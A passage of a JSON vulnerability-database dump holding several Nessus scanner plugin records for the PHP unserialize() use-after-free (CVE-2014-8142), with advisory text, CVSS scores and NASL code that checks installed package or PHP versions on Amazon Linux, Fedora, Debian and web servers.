reference:\"php55-snmp-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php55-xmlrpc-5.5.20-2.94.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:34", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .", "modified": "2018-04-18T00:00:00", "published": "2015-01-09T00:00:00", "id": "ALA_ALAS-2015-463.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80414", "title": "Amazon Linux AMI : php54 (ALAS-2015-463)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-463.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80414);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_xref(name:\"ALAS\", value:\"2015-463\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2015-463)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 
value:\n\"Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-463.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php54-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php54-ldap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.36-1.64.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.36-1.64.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 
5.6.x installed on the\nremote host is prior to 5.6.4. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.", "modified": "2018-07-24T00:00:00", "published": "2015-01-02T00:00:00", "id": "PHP_5_6_4.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80332", "title": "PHP 5.6.x < 5.6.4 'process_nested_data' RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80332);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n\n script_name(english:\"PHP 5.6.x < 5.6.4 'process_nested_data' RCE\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.6.x installed on the\nremote host is prior to 5.6.4. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. 
A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.6.4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68594\");\n # https://bugzilla.redhat.com/show_bug.cgi?id=1175718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88c4ed71\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.6.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port 
: port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.[0-3]($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.4' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "18 Dec 2014, PHP 5.5.20\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68185 ('Inconsistent insteadof definition.'- incorrectly\ntriggered). (Julien)\\\\r\\\\n* Fixed bug #68370 ('unset($this)' can make\nthe program crash). (Laruence)\\\\r\\\\n* Fixed bug #68545 (NULL pointer\ndereference in unserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use\nafter free vulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). 
(Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noutdated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n* Fixed\npossible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #66584 (Segmentation\nfault on statement deallocation) (Matteo)\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\\\\r\\\\n\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2015-10-19T00:00:00", "published": "2014-12-30T00:00:00", "id": "FEDORA_2014-17229.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80290", "title": "Fedora 20 : php-5.5.20-2.fc20 (2014-17229)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17229.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80290);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:23:31 $\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"FEDORA\", value:\"2014-17229\");\n\n script_name(english:\"Fedora 20 : php-5.5.20-2.fc20 (2014-17229)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"18 Dec 2014, PHP 5.5.20\\\\r\\\\n\\\\r\\\\nCore:\\\\r\\\\n* Fixed bug #68091 (Some\nZend headers lack appropriate extern 'C' blocks). (Adam)\\\\r\\\\n* Fixed\nbug #68185 ('Inconsistent insteadof definition.'- incorrectly\ntriggered). (Julien)\\\\r\\\\n* Fixed bug #68370 ('unset($this)' can make\nthe program crash). (Laruence)\\\\r\\\\n* Fixed bug #68545 (NULL pointer\ndereference in unserialize.c). (Anatol)\\\\r\\\\n* Fixed bug #68594 (Use\nafter free vulnerability in unserialize()). (CVE-2014-8142) (Stefan\nEsser)\\\\r\\\\n\\\\r\\\\nDate:\\\\r\\\\n* Fixed day_of_week function as it could\nsometimes return negative values internally.\n(Derick)\\\\r\\\\n\\\\r\\\\nFPM:\\\\r\\\\n* Fixed bug #68381 (fpm_unix_init_main\nignores log_level). 
(David Zuelke, Remi)\\\\r\\\\n* Fixed bug #68420\n(listen=9000 listens to ipv6 localhost instead of all addresses).\n(Remi)\\\\r\\\\n* Fixed bug #68421 (access.format='%R' doesn't log ipv6\naddress). (Remi)\\\\r\\\\n* Fixed bug #68423 (PHP-FPM will no longer load\nall pools). (Remi)\\\\r\\\\n* Fixed bug #68428 (listen.allowed_clients is\nIPv4 only). (Remi)\\\\r\\\\n* Fixed bug #68452 (php-fpm man page is\noutdated). (Remi)\\\\r\\\\n* Fixed request #68458 (Change pm.start_servers\ndefault warning to notice). (David Zuelke, Remi)\\\\r\\\\n* Fixed bug\n#68463 (listen.allowed_clients can silently result in no allowed\naccess). (Remi)\\\\r\\\\n* Fixed request #68391 (php-fpm conf files\nloading order). (Florian Margaine, Remi)\\\\r\\\\n* Fixed bug #68478\n(access.log don't use prefix). (Remi)\\\\r\\\\n\\\\r\\\\nMcrypt:\\\\r\\\\n* Fixed\npossible read after end of buffer and use after free.\n(Dmitry)\\\\r\\\\n\\\\r\\\\nPDO_pgsql:\\\\r\\\\n* Fixed bug #66584 (Segmentation\nfault on statement deallocation) (Matteo)\\\\r\\\\n* Fixed bug #67462\n(PDO_PGSQL::beginTransaction() wrongly throws exception when not in\ntransaction) (Matteo)\\\\r\\\\n* Fixed bug #68351 (PDO::PARAM_BOOL and\nATTR_EMULATE_PREPARES misbehaving) (Matteo)\\\\r\\\\n\\\\r\\\\nzlib:\\\\r\\\\n*\nFixed bug #53829 (Compiling PHP with large file support will replace\nfunction gzopen by gzopen64) (Sascha Kettler, Matteo)\\\\r\\\\n\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1175718\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147163.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2110b79c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 
([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"php-5.5.20-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream\nversion 5.4.36, which includes additional bug fixes, new features and\npossibly incompatible changes. Please refer to the upstream changelog\nfor more information :\n\nTwo additional patches were applied on top of the imported new\nupstream version. An out-of-bounds read flaw was fixed which could\nlead php5-cgi to crash. 
Moreover a bug with php5-pgsql in combination\nwith PostgreSQL 9.1 was fixed (Debian Bug #773182).", "modified": "2018-11-10T00:00:00", "published": "2015-01-02T00:00:00", "id": "DEBIAN_DSA-3117.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80308", "title": "Debian DSA-3117-1 : php5 - security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3117. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80308);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/10 11:49:36\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n script_xref(name:\"DSA\", value:\"3117\");\n\n script_name(english:\"Debian DSA-3117-1 : php5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nAs announced in DSA 3064-1 it has been decided to follow the stable\n5.4.x releases for the Wheezy php5 packages. Consequently the\nvulnerabilities are addressed by upgrading PHP to a new upstream\nversion 5.4.36, which includes additional bug fixes, new features and\npossibly incompatible changes. Please refer to the upstream changelog\nfor more information :\n\nTwo additional patches were applied on top of the imported new\nupstream version. An out-of-bounds read flaw was fixed which could\nlead php5-cgi to crash. 
Moreover a bug with php5-pgsql in combination\nwith PostgreSQL 9.1 was fixed (Debian Bug #773182).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=773182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/php5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3117\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 5.4.36-0+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
